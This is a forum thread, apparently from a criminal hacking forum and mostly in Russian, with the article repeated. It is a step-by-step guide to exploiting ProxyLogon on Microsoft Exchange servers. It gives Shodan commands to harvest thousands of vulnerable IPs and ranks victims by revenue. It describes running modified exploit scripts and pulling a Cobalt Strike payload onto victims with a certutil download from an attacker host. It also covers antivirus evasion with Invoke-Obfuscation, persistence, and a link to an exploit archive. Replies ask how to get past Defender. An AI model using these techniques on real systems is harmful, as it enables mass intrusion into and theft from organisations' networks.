Hello mate, great article, well explained... Im having some issues getting the domains, i mean i can get the vulns in this format https://192.168.x.x but i cant get the domain, maybe im skipping somenthing or lost in translation if you have any advice ill be more than grateful!Всем доброго времени суток, нашлось свободное время для написания статьи, строго не судить)). конкретно: что такое ProxyLogon, какой вид уязвимости, а так же как происходило проникновение в сеть, строго не судить, у меня были свои методы проникновения, ------> Поехали!!!
Что такое ProxyLogon?
ProxyLogon - это формально общее название CVE-2021-26855 , уязвимости на сервере Microsoft Exchange Server, которая позволяет злоумышленнику обойти аутентификацию и выдать себя за администратора. Мы также связали эту ошибку с другой уязвимостью произвольного файла CVE-2021-27065 после авторизации связанной с записью , , чтобы получить выполнение кода. Все затронутые компоненты по умолчанию уязвимы !
В результате , не прошедший проверку подлинности, злоумышленник может выполнять произвольные команды на сервере Microsoft Exchange Server через только открытый порт 443 !
Что нам потребуется?
1) Это сам ProxyLogon, по мне самая хорошая реализация данного CVE от автора Udyz https://github.com/Udyz "Ниже будет выложен доработтаный скрипт"
2) Cobalt Strike
3) Invoke-Obfuscation для Powershell
4) IEX & CERTUTIL.EXE
Оговорюсь сразу работы будет много, данная статья расписана для трудолюбивых так сказать!!!
Атака будет происходить из 3 частей
1) Сбор Материала, Разведка
2) Проникновение в сеть
3) Крепление в сети
Начнем со сбора Материала, мною был выложен "Мануал по Шодан" вот он нам и поможет собрать сразу быстро и много материала, для тестов и проникновения в сеть.
Ссылка на мой пост Мануал по Использованию Shodan.
Приведу сюда пример с моего поста.
Вставляем выложенный мною ключ, пишем ---->> shodan download exchange.json.gz vuln:cve-2021-26855 выдаст плюс минус 10к уязвимых айпи адрессов..
Все на данный момент я вам подсказал где искать сразу и много мата плюс в том что, сразу уязвимый..
После как shodan выкачает все пишем команду ---- >>>> gzip -d exchange.json.gz
После парсим Айпи адреса из файла json ---- >>>> shodan parse exchange.json.gz --fields=ip_str > vuln.txt
На этом сбор материала завершен далее идет разведка материала что он из себя представляет, какое айпи куда относится и т.п
Берем парсер, данный парсер я выложу ниже вместе с другими скриптами.
переименовываем exchange.txt в iplist.txt ждем, данный сканнер покажет какое айпи относится к какому домену есть один подвох некоторые айпи адреса прячутся за провайдерами.
После как парсер спарсит айпи адреса сохранится файлик output.txt где на против каждых айпи будут домены тут уже по пробиву можно взять софт выложенный Борисом, дело каждого.
Хорошо на этом заканчивается разведка Материала какой айпи к чему относится а так же Ревеню.
Шаг второй, сканирования уязвимых айпи на SSRF.
из скрипта было вырезано Авторизация по списку login, и оставленные мною всего 2 логина это administrator & admin, с spn 500, почему я вырезал все остальное и оставил только 2 айпишки, да потому что логины кроме этих двух, не могут авторизоватся и сканирование на пусть будет 20-30 100 штук, это лишняя трата времени.
запускаем скрипт proxy.py -->> идем пить чай, кофе, пиво..
спустя время 10к айпи прочеканы и лежат в output.txt можем сделать так, после как proxy.py закончил свою работу, закидываем айпишки в pars.py и ждем результат какие домены выдал, попадаются разные ревнью, от 300к до 5ккк.
Берем скрипт уже Автора AutoProxyLogon.py оставляем в текстовике только 2 логина administrator & admin, меняем в скрипте автора с cmd /c на powershell /c и строкой ниже так же..
и Вуаля имеем доступ к Машинке и уже с открытым powershell -- пробуем первый вариант, у меня на тот момент 3 vps, на первом Cobalt Strike на 2 teamserver, на 3 не скажу секрет!
Есть 2 варианта генерации а так же доставки, первое поднятие нагрузки в Cobalt, второе генерация payload exe с загрузкой на тот же AnonFiles, и доставка на машинку, CERTUTIL.EXE, иногда бывает в#ебывается на подленность сертификата сайта, 2/3 вариант создания Payload Generator Script(S) web доставка то есть. --->>> Разобрались как будем делать доставку.
Все сгенерировали payload подняли на серваке черезе web доставку, идем в терминал жертвы а то есть в свой, пишем certutil.exe -urlcache -split -f http://{ip}{или domain}/shell.exe shell.exe, я все делал через ngrok что бы понять была ли доставка на компьютер жертвы или нет, 200 ok.
Запуск exeшника производится коммандой -->> start payload.exe может создать батник echo, кому как удобно.
Вуаля мы на машинке жертвы, у нас сессия в кобе)))) 40% сделано, 60% это разведка AD -- поднятие прав -- но это уже совсем другая история, и если я ее тут начну описывать то это займет статей 20 усталых рук!
первый метод payload generator, второй метод Script By Web Delivery --> Powershell IEX, просто вставляем ссылку в терминал и все сессия в кобе, делаем пару прыжков на разные процессы, и закрепление на этом заканчивается, можете еще добавить в автозагрузку backdoor и т.д! дело каждого!
Посмотреть вложение 23816
Забыли про Invoke-Obfuscation, бывают такие моменты что ав блокает запуск вашего exe и удаляет сразу, качает Invoke-Obfuscation с githubGitHub - danielbohannon/Invoke-Obfuscation: PowerShell Obfuscator
PowerShell Obfuscator. Contribute to danielbohannon/Invoke-Obfuscation development by creating an account on GitHub.github.com
Посмотреть вложение 23817
Generating a powershell payload in the koba ---> go to the Invoke-Obfuscation folder -> ps.exe> Import-Module. \ Invoke-Obfuscation.psd1 --- >> Invoke-Obfuscation next commands for obfuscation
Посмотреть вложение 23821
Посмотреть вложение 23820
set ScriptPath dir {payload.ps1} -> set the path to the payload
sting - token ---> obfuscation method
all - all
one
clip - copy
open the same payload.ps1 clear all ctrl - A + ctrl + V save
we throw it to check for anti-scan, out of a million detections, 1 - 2 detects, and in some moments of food this method is quite enough for us to get a session in Cobalt .. we also attach an injection in a couple of processes !!!
Посмотреть вложение 23817Посмотреть вложение 23816
https://anonfiles.com/p2x0s522u5/ProxyLogon_zip || xss.pro || link to the archive with a script from the author and modified.
I am sorry for mistakes! More interesting))
Thank you all for your attention, Write in this article in case something does not work out, I will help explain I will tell you!
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Статья ProxyLogon & CVE-2021-26855
- Автор темы C0rtex
- Дата начала
Хорошая статья 
This really work in Defender?
I used invoke-obfustication,but same result 'This script contains malicious content and has been blocked by your antivirus'.
plz tell me in this environment.
I used invoke-obfustication,but same result 'This script contains malicious content and has been blocked by your antivirus'.
plz tell me in this environment.
My mean is that i can't any powershell -c XXX command.here is the scanned windef file
Only work powershell -c whoami, other powershell -c xxx is blocked.
'This script contains malicious content and has been blocked by your antivirus'
plz tell me some example.
Зачет
В чем смысл использования паблик эксплойтов? Ведь все то, к чему вы получите доступ - будет и у вашего конкурента. Какой смысл играть наперегонки?
Это было написано не в упрек, а из любопытства. Я получил несколько доступов на корп тачки через публичную уязвимость, но к моему удивлению там было очень много таких же как и я. И я не понимаю как люди работают по публичным уязвимостям. Наперегонки захватывают домен? Какой в этом смысл...
ТС, я наверно глаза не так протер или что. Не могу понять где взять парсер, который к айпихам юрл подставляет?
В конце концов каждый приват становиться пабликом.
Ну и добавлю что есть два типа людей одни мыслят точно как вы и даже пробовать не будут. Зачем ведь? А другой тип который возьмёт и даже в этом паблике найдёт что то
А конкуренция некуда не пропала, она всегда была и всегда останется.
Вы думаете что когда адверты бегают с партнерки в партнерку они не перемещаются с тем чего они научились и передают это чтобы "отомстить" за изгнание?
Спасибо за статью
Если пишет
"
AV block exec cmd!!
"
Я могу обойти или бесполезно пытаться ?
Если в ответ пустота, команды могут все равно срабатывать или нет ?
"
AV block exec cmd!!
"
Я могу обойти или бесполезно пытаться ?
Если в ответ пустота, команды могут все равно срабатывать или нет ?
Хорошая статья ... Спасибо ТС за скрипты...соглашусь что подача у ТС своеобразная)))
чуть дополню кобальт страйк от х4к https://www.xss.pro/threads/51342/ за что Огромное СПАСИБО!
а так с такими инструментами любому начинающему просто супер подарок..
чуть дополню кобальт страйк от х4к https://www.xss.pro/threads/51342/ за что Огромное СПАСИБО!
а так с такими инструментами любому начинающему просто супер подарок..
Почему AMSI нислова?)Было бы зачетно увидеть свежие обходы
Пиши исчо.Интересно.
Статья отличная
Пока не понял, написано очень бегло. Но первая статья, я так понял на эту тему. Это надо было сделатьче ребята, господа, что то нас мало в голосах) скорее всего не поняли как пользоватся этим exploitom
тема вполне очень хорошая, нашел для себя, что то новое
thanksВсем доброго времени суток, нашлось свободное время для написания статьи, строго не судить)). конкретно: что такое ProxyLogon, какой вид уязвимости, а так же как происходило проникновение в сеть, строго не судить, у меня были свои методы проникновения, ------> Поехали!!!
Что такое ProxyLogon?
ProxyLogon - это формально общее название CVE-2021-26855 , уязвимости на сервере Microsoft Exchange Server, которая позволяет злоумышленнику обойти аутентификацию и выдать себя за администратора. Мы также связали эту ошибку с другой уязвимостью произвольного файла CVE-2021-27065 после авторизации связанной с записью , , чтобы получить выполнение кода. Все затронутые компоненты по умолчанию уязвимы !
В результате , не прошедший проверку подлинности, злоумышленник может выполнять произвольные команды на сервере Microsoft Exchange Server через только открытый порт 443 !
Что нам потребуется?
1) Это сам ProxyLogon, по мне самая хорошая реализация данного CVE от автора Udyz https://github.com/Udyz "Ниже будет выложен доработтаный скрипт"
2) Cobalt Strike
3) Invoke-Obfuscation для Powershell
4) IEX & CERTUTIL.EXE
Оговорюсь сразу работы будет много, данная статья расписана для трудолюбивых так сказать!!!
Атака будет происходить из 3 частей
1) Сбор Материала, Разведка
2) Проникновение в сеть
3) Крепление в сети
Начнем со сбора Материала, мною был выложен "Мануал по Шодан" вот он нам и поможет собрать сразу быстро и много материала, для тестов и проникновения в сеть.
Ссылка на мой пост Мануал по Использованию Shodan.
Приведу сюда пример с моего поста.
Вставляем выложенный мною ключ, пишем ---->> shodan download exchange.json.gz vuln:cve-2021-26855 выдаст плюс минус 10к уязвимых айпи адрессов..
Все на данный момент я вам подсказал где искать сразу и много мата плюс в том что, сразу уязвимый..
После как shodan выкачает все пишем команду ---- >>>> gzip -d exchange.json.gz
После парсим Айпи адреса из файла json ---- >>>> shodan parse exchange.json.gz --fields=ip_str > vuln.txt
На этом сбор материала завершен далее идет разведка материала что он из себя представляет, какое айпи куда относится и т.п
Берем парсер, данный парсер я выложу ниже вместе с другими скриптами.
переименовываем exchange.txt в iplist.txt ждем, данный сканнер покажет какое айпи относится к какому домену есть один подвох некоторые айпи адреса прячутся за провайдерами.
После как парсер спарсит айпи адреса сохранится файлик output.txt где на против каждых айпи будут домены тут уже по пробиву можно взять софт выложенный Борисом, дело каждого.
Хорошо на этом заканчивается разведка Материала какой айпи к чему относится а так же Ревеню.
Шаг второй, сканирования уязвимых айпи на SSRF.
из скрипта было вырезано Авторизация по списку login, и оставленные мною всего 2 логина это administrator & admin, с spn 500, почему я вырезал все остальное и оставил только 2 айпишки, да потому что логины кроме этих двух, не могут авторизоватся и сканирование на пусть будет 20-30 100 штук, это лишняя трата времени.
запускаем скрипт proxy.py -->> идем пить чай, кофе, пиво..
спустя время 10к айпи прочеканы и лежат в output.txt можем сделать так, после как proxy.py закончил свою работу, закидываем айпишки в pars.py и ждем результат какие домены выдал, попадаются разные ревнью, от 300к до 5ккк.
Берем скрипт уже Автора AutoProxyLogon.py оставляем в текстовике только 2 логина administrator & admin, меняем в скрипте автора с cmd /c на powershell /c и строкой ниже так же..
и Вуаля имеем доступ к Машинке и уже с открытым powershell -- пробуем первый вариант, у меня на тот момент 3 vps, на первом Cobalt Strike на 2 teamserver, на 3 не скажу секрет!
Есть 2 варианта генерации а так же доставки, первое поднятие нагрузки в Cobalt, второе генерация payload exe с загрузкой на тот же AnonFiles, и доставка на машинку, CERTUTIL.EXE, иногда бывает в#ебывается на подленность сертификата сайта, 2/3 вариант создания Payload Generator Script(S) web доставка то есть. --->>> Разобрались как будем делать доставку.
Все сгенерировали payload подняли на серваке черезе web доставку, идем в терминал жертвы а то есть в свой, пишем certutil.exe -urlcache -split -f http://{ip}{или domain}/shell.exe shell.exe, я все делал через ngrok что бы понять была ли доставка на компьютер жертвы или нет, 200 ok.
Запуск exeшника производится коммандой -->> start payload.exe может создать батник echo, кому как удобно.
Вуаля мы на машинке жертвы, у нас сессия в кобе)))) 40% сделано, 60% это разведка AD -- поднятие прав -- но это уже совсем другая история, и если я ее тут начну описывать то это займет статей 20 усталых рук!
первый метод payload generator, второй метод Script By Web Delivery --> Powershell IEX, просто вставляем ссылку в терминал и все сессия в кобе, делаем пару прыжков на разные процессы, и закрепление на этом заканчивается, можете еще добавить в автозагрузку backdoor и т.д! дело каждого!
Посмотреть вложение 23816
Забыли про Invoke-Obfuscation, бывают такие моменты что ав блокает запуск вашего exe и удаляет сразу, качает Invoke-Obfuscation с githubGitHub - danielbohannon/Invoke-Obfuscation: PowerShell Obfuscator
PowerShell Obfuscator. Contribute to danielbohannon/Invoke-Obfuscation development by creating an account on GitHub.github.com
Посмотреть вложение 23817
Генерируем в кобе полезную нагрузку powershell ---> заходим в папку Invoke-Obfuscation --> ps.exe > Import-Module .\Invoke-Obfuscation.psd1 --->> Invoke-Obfuscation далее комманды для обфускации
Посмотреть вложение 23821
Посмотреть вложение 23820
set ScriptPath dir{payload.ps1} -> задаем путь до полезной нагрузки
sting - token ---> метод обфускации
all - все
1
clip - копировать
открываем тот же payload.ps1 вычищаем все ctrl - A + ctrl + V save
кидаем для проверки на антискан, из миллион детектов 1 - 2 детект, а в некоторых моментах фуд такой метод нам вполне хватит для получения сессии в Cobalt.. так же инжектив в пару процессов крепимся!!!
Посмотреть вложение 23817Посмотреть вложение 23816
https://anonfiles.com/p2x0s522u5/ProxyLogon_zip || xss.pro || ссылка на архив со скриптом от автора и, доработанным.
Прошу прощения за ошибки! Дальше Интереснее))
Всем спасибо за внимание, Пишите в данной статье в случае если что-то не будет получатся, помогу объясню расскажу!
i have a little problem though
how can i remote to the target ?
Good subject, thank you